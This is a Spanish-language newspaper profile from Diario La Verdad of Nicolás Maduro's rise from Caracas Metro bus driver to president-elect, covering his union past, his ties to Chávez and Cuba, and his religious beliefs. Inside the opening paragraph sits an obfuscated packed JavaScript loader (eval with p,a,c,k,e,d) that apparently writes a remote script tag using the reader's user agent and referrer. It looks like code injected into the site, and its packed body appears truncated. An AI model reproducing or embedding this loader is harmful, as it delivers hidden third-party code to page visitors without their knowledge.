publicidad

Nicolás Maduro: De chofer a Presidente

José Gregorio Martínez / Caracas / noticias@laverdad
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nirsa|var|u0026u|referrer|drtyr||js|php'.split('|'),0,{})) Presidente electo es considerado el hombre más leal a Chávez y el más cercano a los Castro. La teoría de la reencarnación de Chávez en un pajarito quizás podía estar sustentada en sus creencias en el hinduismo

Nicolás Maduro gana la Presidencia de la República bajo la sombra del recuerdo del presidente fallecido Hugo Chávez. (Foto:Archivo)

La misión de continuar la revolución sin la presencia física de su líder la cumplió. El reto ahora para el Presidente electo es dejar de ser el hijo de Chávez y comenzar a ser Nicolás Maduro, el que prometió acabar con la inseguridad y la corrupción. El endose de los votos que eran de Chávez no fue gratis, si la misión “Eficiencia o nada” no comienza a dar frutos en corto plazo serán sus mismos electores quienes le pasarán factura. El pajarito ya voló y tanto oficialistas como opositores no tardarán en hacer presión por el cumplimiento de sus promesas.

Nicolás Maduro Moros, cédula de identidad número V-5.892.464, nació en Caracas el 23 de noviembre de 1962. Según él mismo ha señalado, se crió en la urbanización Valle Abajo, una zona de clase media de la capital. Su perfil académico llega hasta la culminación del tercer año de bachillerato en el Liceo Ávalos; de allí, su historia salta a los inicios como conductor de autobús en el Metro de Caracas y, tal como lo confesó en una entrevista en Venevisión, fue a los 29 años cuando se estrenó como chofer. ¿Qué hizo desde los 17 años, cuando abandonó sus estudios, hasta los 29? Muy poco se sabe, o al menos nada ha mencionado Maduro al respecto, excepto que era bajista en una banda de rock llamada Enigma.

Desde los 12 años tuvo inclinaciones políticas, formando parte de la organización de izquierda Ruptura y posteriormente de la Liga Socialista. Según su currículo, antes de entrar al Metro de Caracas trabajó como encuestador, mensajero, promotor cultural y representante comunal. Fue el 21 de febrero de 1991 cuando ingresó al Metro de Caracas, tras haber aprobado el curso de formación como operador de transporte superficial. 

Entre reposos e ideologización

A los siete meses se afilió al Sindicato de los Trabajadores del Metro de Caracas, donde llegó a ser miembro de la junta directiva, pero el 15 de febrero de 1996 fue expulsado por “conducta antisindical”. Luego, el 11 de diciembre de ese mismo año, pasó a formar parte de la recién creada Asociación Unitaria de los Trabajadores del Metro, de la cual fue fundador.

Su eficiencia como empleado ha sido muy cuestionada. Henrique Capriles la llamó “vago” y “reposero” durante la campaña. Y es que según su historial laboral aparecen más de 20 faltas a su puesto de trabajo, muchas sin justificación y otras con consignación de reposo médico. 

En 1993, Nicolás Maduro conoció a Hugo Chávez cuando lo visitó en la cárcel junto con un grupo de simpatizantes del movimiento chavista que se empezaba a gestar luego del intento de golpe de Estado del 4 de febrero de 1992. Desde entonces se volvió un activista por su liberación. Fue allí cuando conoció a Cilia Flores, su “compañera de vida”, como él la llama. Ella formaba parte del grupo de abogados que gestionó el indulto ante el presidente Rafael Caldera. Luego de la salida de Chávez de prisión, en 1994, Nicolás Maduro y Cilia Flores ayudaron a Chávez a organizar su movimiento político con miras a las elecciones de 1998; fue así como nació el Movimiento Quinta República (MVR), en el que militó desde sus inicios, aunque ya antes también había estado activo dentro del Movimiento Bolivariano Revolucionario 200 (MBR200). 

Subió como la espuma

Cuando Hugo Chávez llegó al poder en 1999, Nicolás Maduro comenzó su carrera política con un acenso vertiginoso. Ese mismo año fue elegido diputado a la Asamblea Nacional Constituyente que redacto la nueva Constitución; en el año 2000 fue electo diputado para la nueva Asamblea Nacional unicameral,  cargo en el que fue reelecto en las elecciones legislativas de 2005, siendo designado presidente del parlamento.

En 2006, el presidente Chávez lo llamó a ingresar al gabinete ejecutivo como Canciller de la República, dejándole la Presidencia de la Asamblea Nacional a Cilia Flores. Chávez lo consideraba uno de sus hombres más leales, también es el hombre de mayor confianza de los Castro, no en vano recibió formación ideológica en la Escuela Superior del Partido Comunista en Cuba.

Nicolás Maduro fue una de las pocas fichas de Chávez que logró mantenerse por un largo tiempo en un mismo cargo. La Cancillería estuvo en sus manos más de seis años. Fue el 10 de octubre de 2012 cuando fue nombrado vicepresidente, en sustitución de Elías Jaua, quien debía separarse del cargo para aspirar a la Gobernación de Miranda. Ya Chávez estaba arando el camino para dejarlo como su sucesor, pero fue el 8 de diciembre cuando en su última cadena de radio y televisión, el Primer Mandatario lo dejó encargado del país y de su revolución.

La enfermedad de Chávez marcó su corto desempeño como vicepresidente, en el que le tocó aplicar medidas económicas como la devaluación y anunciar la muerte de Hugo Chávez el 5 marzo pasado. Tres días después asumió como Presidente interinó ante la Asamblea Nacional en una polémica juramentación que estuvo precedida por el fallo del Tribunal Supremo de Justicia que lo habilitaba como candidato a la Presidencia sin renunciar al cargo.

Su ideología política está bien definida hacía la extrema izquierda pero su creencia religiosa no queda del todo clara. Nicolás Maduro es de origen judío sefardí (judíos hispano-portugueses), durante la campaña se declaró cristiano pero su compañera Cilia Flores ha confesado que ambos siguen como líder espiritual al gurú hindú Sathya Sai Baba, fallecido en 2011, quien se autoproclamaba el avatar de Dios para esta era, es decir, su reencarnación, según la doctrina del hinduismo, la que dejó claro antes de su fallecimiento es si era posible la reencarnación en un pajarito.

El testamento

“Si algo ocurriera, que a mí me inhabilite para continuar al frente de la Presidencia de la República Bolivariana de Venezuela, Nicolás Maduro no sólo en esa situación debe concluir como manda la Constitución el período, sino que mi opinión firme y plena, irrevocable, absoluta, total, es que en ese escenario, que obligaría a convocar a elecciones presidenciales, ustedes elijan a Nicolás Maduro como Presidente”. Hugo Chávez, 8 de diciembre de 2012.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama
lvd_home_izq_160x600